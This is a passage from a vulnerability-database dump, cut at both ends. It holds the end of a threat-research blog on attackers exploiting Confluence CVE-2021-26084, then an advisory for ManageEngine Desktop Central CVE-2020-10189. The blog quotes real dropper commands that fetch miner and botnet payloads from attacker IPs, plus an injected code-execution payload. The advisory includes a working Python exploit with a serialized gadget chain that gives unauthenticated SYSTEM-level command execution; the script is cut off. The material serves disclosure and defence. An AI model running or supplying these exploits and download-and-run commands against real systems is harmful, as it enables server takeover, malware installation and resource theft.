System.Net.Webclient).DownloadString(&#x27;[hxxp://27.1.1.34:8080/docs/s/sys.ps1](<8080/docs/s/sys.ps1>)&#x27;)\n\nShell Dropper scripts: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/26084.txt](<http://27.1.1.34:8080/docs/s/26084.txt>) -o /tmp/.solrg \nPost-exploitation linked clean up scripts that remove all traces of the dropper script mentioned above: \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kg.txt](<8080/docs/s/kg.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kk.txt](<8080/docs/s/kk.txt>) -o /tmp/.solrx \ncurl -fsSL [hxxp://27.1.1.34:8080/docs/s/kill.sh](<8080/docs/s/kk.txt>) -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using the similar payload found in the vulnerable querystring parameter shown above.\n\nBelow is one example where again the attacker is using different code execution command based on the affected server operating system detected: \nqueryString=aaaaaaaa&#x27;+{Class.forName(&#x27;javax.script.ScriptEngineManager \n&#x27;).newInstance().getEngineByName(&#x27;JavaScript&#x27;).eval(&#x27;var isWin = \njava.lang.System.getProperty(&quot;os.name&quot;).toLowerCase().contains(&quot;win&quot;); \n**var cmd = new java.lang.String(&quot;bash /tmp/.solrg**&quot;);var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command(&quot;cmd.exe&quot;, &quot;/c&quot;, cmd); \n} else{p.command(&quot;bash&quot;, &quot;-c&quot;, cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = &quot;&quot;; var output = &quot;&quot;; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}&#x27;)}+&#x27;\n\n### Dropper Script Analysis\n\nAs mentioned earlier, the first part of the dropper scripts are performing the removal of competing crypto mining processes and their related files.\n\nOn Linux systems:\n\nOn Windows systems:\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malwares (pastebin).\n\nOn Linux systems:\n\nOn Windows systems:\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nAnd finally, the script starting the XMRig mining and execution of post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script which in turn executes solrd, which is the XMRig Miner file that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (function Update($url,$path,$proc_name) that performs file downloads using the WebClient.DownloadFile Method using a System.Net.WebClient object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = &quot;hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe&quot; \n$miner_name = &quot;javae&quot; \n$miner_path = &quot;$env:TMP\\javae.exe&quot; \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = &quot;hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json&quot; \n$miner_cfg_name = &quot;config.json&quot; \n$miner_cfg_path = &quot;$env:TMP\\config.json&quot; \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = &quot;hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat&quot; \n$killmodule_name = &quot;clean.bat&quot; \n$killmodule_path = &quot;$env:TMP\\clean.bat&quot; \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders. \nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to the said function. \nNext it sets the System File, Hidden File and Read-Only attributes for the newly downloaded miner files, and starts the miner process.\n\nLast step is executing the clean-up batch script, and termination of the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTP (tactics, techniques, procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed including downloaders, payloads, configuration, C&amp;C servers and more, we identified a known threat actor that is tied to previous attack campaigns going back as far as March 2021.\n\nThe C&amp;C 27[.]1[.]1[.]34[:]8080 has been previously associated with the z0Miner botnet. \nz0Miner is a malicious mining family that became active last year and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle Weblogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), which used the same methodology as mentioned earlier to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IOT Botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing crypto currency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 publicly published, the Imperva Threat Research team immediately began their research on creating a mitigation. It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-04-20T17:15:52", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileStorage class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.\n\n**Affected Vendors:**\n\nManageEngine\n\n**Affected Products:**\n\nDesktop Central\n\n**Vendor Response:**\n\nManageEngine has issued an update to correct this vulnerability. More details can be found at: \n<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2020-0011 : ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "SRC-2020-0011", "href": "https://srcincite.io/advisories/src-2020-0011/", "sourceData": "#!/usr/bin/env python3\n\"\"\"\nManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability\n\nDownload: https://www.manageengine.com/products/desktop-central/download-free.html\nFile ...: ManageEngine_DesktopCentral_64bit.exe\nSHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826\nFound by: mr_me\nDate ...: 2019-12-12\nCVE ....: CVE-2020-10189\nClass ..: CWE-502\nCVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\nPatch ..: https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n\n## Summary:\n\nAn unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.\n\n## Vulnerability Analysis:\n\nIn the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.\n\n```CewolfServletde.laures.cewolf.CewolfRendererdebugfalseoverliburl/js/overlib.jsstoragede.laures.cewolf.storage.FileStorage1...CewolfServlet/cewolf/*```\n\nThis servlet, contains the following code:\n\n```\n protected void doGet(HttpServletRequest request, HttpServletResponse response)\n throws ServletException, IOException {\n if (debugged) {\n logRequest(request);\n }\n addHeaders(response);\n if ((request.getParameter(\"state\") != null) || (!request.getParameterNames().hasMoreElements())) {\n requestState(response);\n return;\n }\n int width = 400;\n int height = 400;\n boolean removeAfterRendering = false;\n if (request.getParameter(\"removeAfterRendering\") != null) {\n removeAfterRendering = true;\n }\n if (request.getParameter(\"width\") != null) {\n width = Integer.parseInt(request.getParameter(\"width\"));\n }\n if (request.getParameter(\"height\") != null) {\n height = Integer.parseInt(request.getParameter(\"height\"));\n }\n if (!renderingEnabled) {\n renderNotEnabled(response, 400, 50);\n return;\n }\n if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {\n renderImageTooLarge(response, 400, 50);\n return;\n }\n String imgKey = request.getParameter(\"img\"); // 1\n if (imgKey == null) {\n logAndRenderException(new ServletException(\"no 'img' parameter provided for Cewolf servlet.\"), response,\n width, height);\n return;\n }\n Storage storage = config.getStorage();\n ChartImage chartImage = storage.getChartImage(imgKey, request); // 2\n```\n\nAt [1] the code sets the `imgKey` variable using the GET parameter `img`. Later at [2], the code then calls the `storage.getChartImage` method with the attacker supplied `img`. You maybe wondering what class the `storage` instance is. This was mapped as an initializing parameter to the servlet code in the web.xml file:\n\n```storagede.laures.cewolf.storage.FileStorage```\n\n```\npublic class FileStorage implements Storage {\n static final long serialVersionUID = -6342203760851077577L;\n String basePath = null;\n List stored = new ArrayList();\n private boolean deleteOnExit = false;\n\n //...\n\n public void init(ServletContext servletContext) throws CewolfException {\n basePath = servletContext.getRealPath(\"/\");\n Configuration config = Configuration.getInstance(servletContext);\n deleteOnExit = \"true\".equalsIgnoreCase(\"\" + (String) config.getParameters().get(\"FileStorage.deleteOnExit\"));\n servletContext.log(\"FileStorage initialized, deleteOnExit=\" + deleteOnExit);\n }\n\n //...\n\n private String getFileName(String id) {\n return basePath + \"_chart\" + id; // 4\n }\n\n //...\n\n public ChartImage getChartImage(String id, HttpServletRequest request) {\n ChartImage res = null;\n ObjectInputStream ois = null;\n try {\n ois = new ObjectInputStream(new FileInputStream(getFileName(id))); // 3\n res = (ChartImage) ois.readObject(); // 5\n ois.close();\n } catch (Exception ex) {\n ex.printStackTrace();\n } finally {\n if (ois != null) {\n try {\n ois.close();\n } catch (IOException ioex) {\n ioex.printStackTrace();\n }\n }\n }\n return res;\n }\n```\n\nAt [3] the code calls `getFileName` using the attacker controlled `id` GET parameter which returns a path to a file on the filesystem using `basePath`. This field is set in the `init` method of the servlet. On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.\n\nThe most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.\n\n## Exploitation:\n\nFor exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filesystem with controlled content inside. Here is the corresponding web.xml entry:\n\n```MDMLogUploaderServletcom.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet...MDMLogUploaderServlet/mdm/mdmLogUploader/mdm/client/v1/mdmLogUploader```\n\n```\npublic class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {\n private Logger logger = Logger.getLogger(\"MDMLogger\");\n private Long customerID;\n private String deviceName;\n private String domainName;\n private Long resourceID;\n private Integer platformType;\n private Long acceptedLogSize = Long.valueOf(314572800L);\n\n public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)\n throws ServletException, IOException {\n Reader reader = null;\n PrintWriter printWriter = null;\n\n logger.log(Level.WARNING, \"Received Log from agent\");\n\n Long nDataLength = Long.valueOf(request.getContentLength());\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : file conentent lenght is {0}\", nDataLength);\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet :Acceptable file conentent lenght is {0}\", acceptedLogSize);\n try {\n if (nDataLength.longValue() <= acceptedLogSize.longValue()) {\n String udid = request.getParameter(\"udid\"); // 1\n String platform = request.getParameter(\"platform\");\n String fileName = request.getParameter(\"filename\"); // 2\n HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);\n if (deviceMap != null) {\n customerID = ((Long) deviceMap.get(\"CUSTOMER_ID\"));\n deviceName = ((String) deviceMap.get(\"MANAGEDDEVICEEXTN.NAME\"));\n domainName = ((String) deviceMap.get(\"DOMAIN_NETBIOS_NAME\"));\n resourceID = ((Long) deviceMap.get(\"RESOURCE_ID\"));\n platformType = ((Integer) deviceMap.get(\"PLATFORM_TYPE\"));\n } else {\n customerID = Long.valueOf(0L);\n deviceName = \"default\";\n domainName = \"default\";\n }\n String baseDir = System.getProperty(\"server.home\");\n\n deviceName = removeInvalidCharactersInFileName(deviceName);\n\n String localDirToStore = baseDir + File.separator + \"mdm-logs\" + File.separator + customerID\n + File.separator + deviceName + \"_\" + udid; // 3\n\n File file = new File(localDirToStore);\n if (!file.exists()) {\n file.mkdirs(); // 4\n }\n logger.log(Level.WARNING, \"absolute Dir {0} \", new Object[]{localDirToStore});\n\n fileName = fileName.toLowerCase();\n if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, \"log|txt|zip|7z\"))) { // 5\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : Going to reject the file upload {0}\", fileName);\n response.sendError(403, \"Request Refused\");\n return;\n }\n String absoluteFileName = localDirToStore + File.separator + fileName; // 6\n\n logger.log(Level.WARNING, \"absolute File Name {0} \", new Object[]{fileName});\n\n InputStream in = null;\n FileOutputStream fout = null;\n try {\n in = request.getInputStream(); // 7\n fout = new FileOutputStream(absoluteFileName); // 8\n\n byte[] bytes = new byte['\u2710'];\n int i;\n while ((i = in.read(bytes)) != -1) {\n fout.write(bytes, 0, i); // 9\n }\n fout.flush();\n } catch (Exception e1) {\n e1.printStackTrace();\n } finally {\n if (fout != null) {\n fout.close();\n }\n if (in != null) {\n in.close();\n }\n }\n SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();\n supportFileCreation.incrementMDMLogUploadCount();\n JSONObject deviceDetails = new JSONObject();\n deviceDetails.put(\"platformType\", platformType);\n deviceDetails.put(\"dataId\", resourceID);\n deviceDetails.put(\"dataValue\", deviceName);\n supportFileCreation.removeDeviceFromList(deviceDetails);\n } else {\n logger.log(Level.WARNING,\n \"MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}\",\n nDataLength);\n response.sendError(403, \"Request Refused\");\n return;\n }\n return;\n } catch (Exception e) {\n logger.log(Level.WARNING, \"Exception \", e);\n } finally {\n if (reader != null) {\n try {\n reader.close();\n } catch (Exception ex) {\n ex.fillInStackTrace();\n }\n }\n }\n }\n```\n\n```\n private static boolean isContainDirectoryTraversal(String fileName) {\n if ((fileName.contains(\"/\")) || (fileName.contains(\"\\\\\"))) {\n return true;\n }\n return false;\n }\n\n //...\n\n public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {\n if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))\n || (!isValidFileExtension(fileName, allowedFileExt))) {\n return true;\n }\n return false;\n }\n```\n\nWe can see that at [1] the `udid` variable is controlled using the `udid` GET parameter from a POST request. At [2] the `fileName` variable is controlled from the GET parameter `filename`. This `filename` GET parameter is actually filtered in 2 different ways for malicious values. At [3] a path is contructed using the GET parameter from [1] and at [4] a `mkdirs` primitive is hit. This is important because the _charts directory doesn't exist on the filesystem which is needed in order to exploit the deserialization bug. There is some validation on the `filename` at [5] which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow list of extensions.\n\nOf course, this doesn't stop `udid` from containing directory traversals, but I digress. At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:\n\n```config-filesecurity-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,security-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml```\n\nThe file that stands out is the `security-mdm-agent.xml` config file. The corrosponding entry for the `MDMLogUploaderServlet` servlet looks like this:\n\n``````\n\nNote that the authentication attribute is ignored in this case. The `filename` GET parameter is restricted to the following strings: \"logger.txt\", \"logger.zip\", \"mdmlogs.zip\" and \"managedprofile_mdmlogs.zip\" using a regex pattern. For exploitation, this limitation doesn't matter since the deserialization bug permits a completely controlled filename.\n\n## Example:\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py(+) eg: ./poc.py 172.16.175.153 mspaint.exe\n\nsaturn:~ mr_me$ ./poc.py 172.16.175.153 \"cmd /c whoami > ../webapps/DesktopCentral/si.txt\"\n(+) planted our serialized payload\n(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt\n\nsaturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt\nnt authority\\system\n\"\"\"\nimport os\nimport sys\nimport struct\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_payload(c):\n p = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594\"\n p += \"da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400\"\n p += \"164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200\"\n p += \"2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265\"\n p += \"616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172\"\n p += \"61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e\"\n p += \"672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e\"\n p += \"732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172\"\n p += \"61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75\"\n p += \"7470757450726f706572746965737704000000037372003a636f6d2e73756e2e\"\n p += \"6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e\"\n p += \"747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d\"\n p += \"5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00\"\n p += \"0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a\"\n p += \"6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f\"\n p += \"6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072\"\n p += \"6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767\"\n p += \"db37020000787000000002757200025b42acf317f8060854e002000078700000\"\n p += \"069bcafebabe0000003200390a00030022070037070025070026010010736572\"\n p += \"69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75\"\n p += \"6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465\"\n p += \"01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162\"\n p += \"6c655461626c6501000474686973010013537475625472616e736c6574506179\"\n p += \"6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c\"\n p += \"2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73\"\n p += \"6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f\"\n p += \"73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873\"\n p += \"6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c\"\n p += \"2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469\"\n p += \"6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73\"\n p += \"756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c\"\n p += \"74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f\"\n p += \"72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65\"\n p += \"722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074\"\n p += \"696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78\"\n p += \"616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e\"\n p += \"2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d\"\n p += \"417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865\"\n p += \"2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69\"\n p += \"7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63\"\n p += \"6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64\"\n p += \"746d2f44544d417869734974657261746f723b01000768616e646c6572010041\"\n p += \"4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c\"\n p += \"2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572\"\n p += \"3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a\"\n p += \"000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f\"\n p += \"4761646765747324537475625472616e736c65745061796c6f6164010040636f\"\n p += \"6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f\"\n p += \"78736c74632f72756e74696d652f41627374726163745472616e736c65740100\"\n p += \"146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f\"\n p += \"6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f\"\n p += \"5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061\"\n p += \"796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100\"\n p += \"116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469\"\n p += \"6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a\"\n p += \"002b002e01000708003001000465786563010027284c6a6176612f6c616e672f\"\n p += \"537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033\"\n p += \"0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961\"\n p += \"6c2f50776e6572373633323838353835323036303901001f4c79736f73657269\"\n p += \"616c2f50776e657237363332383835383532303630393b002100020003000100\"\n p += \"040001001a000500060001000700000002000800040001000a000b0001000c00\"\n p += \"00002f00010001000000052ab70001b100000002000d0000000600010000002e\"\n p += \"000e0000000c000100000005000f003800000001001300140002000c0000003f\"\n p += \"0000000300000001b100000002000d00000006000100000033000e0000002000\"\n p += \"0300000001000f00380000000000010015001600010000000100170018000200\"\n p += \"19000000040001001a00010013001b0002000c000000490000000400000001b1\"\n p += \"00000002000d00000006000100000037000e0000002a000400000001000f0038\"\n p += \"00000000000100150016000100000001001c001d000200000001001e001f0003\"\n p += \"0019000000040001001a00080029000b0001000c00000024000300020000000f\"\n p += \"a70003014cb8002f1231b6003557b10000000100360000000300010300020020\"\n p += \"00000002002100110000000a000100020023001000097571007e0010000001d4\"\n p += \"cafebabe00000032001b0a000300150700170700180700190100107365726961\"\n p += \"6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505\"\n p += \"71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100\"\n p += \"0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65\"\n p += \"5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365\"\n p += \"730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164\"\n p += \"6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473\"\n p += \"2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61\"\n p += \"64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f\"\n p += \"4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f\"\n p += \"79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300\"\n p += \"2100020003000100040001001a00050006000100070000000200080001000100\"\n p += \"0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000\"\n p += \"000600010000003b000e0000000c000100000005000f00120000000200130000\"\n p += \"0002001400110000000a000100020016001000097074000450776e7270770100\"\n p += \"7871007e000d78\"\n obj = bytearray(bytes.fromhex(p))\n obj[0x240:0x242] = struct.pack(\">H\", len(c) + 0x694)\n obj[0x6e5:0x6e7] = struct.pack(\">H\", len(c))\n start = obj[:0x6e7]\n end = obj[0x6e7:]\n return start + str.encode(c) + end\n\ndef we_can_plant_serialized(t, c):\n # stage 1 - traversal file write primitive\n uri = \"https://%s:8383/mdm/client/v1/mdmLogUploader\" % t\n p = {\n \"udid\" : \"si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart\",\n \"filename\" : \"logger.zip\"\n }\n h = { \"Content-Type\" : \"application/octet-stream\" }\n d = _get_payload(c)\n r = requests.post(uri, params=p, data=d, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_execute_cmd(t):\n # stage 2 - deserialization\n uri = \"https://%s:8383/cewolf/\" % t\n p = { \"img\" : \"\\\\logger.zip\" }\n r = requests.get(uri, params=p, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef main():\n if len(sys.argv) != 3:\n print(\"(+) usage: %s\" % sys.argv[0])\n print(\"(+) eg: %s 172.16.175.153 mspaint.exe\" % sys.argv[0])\n sys.exit(1)\n t = sys.argv[1]\n c = sys.argv[2]\n if we_can_plant_serialized(t, c):\n print(\"(+) planted our serialized payload\")\n if 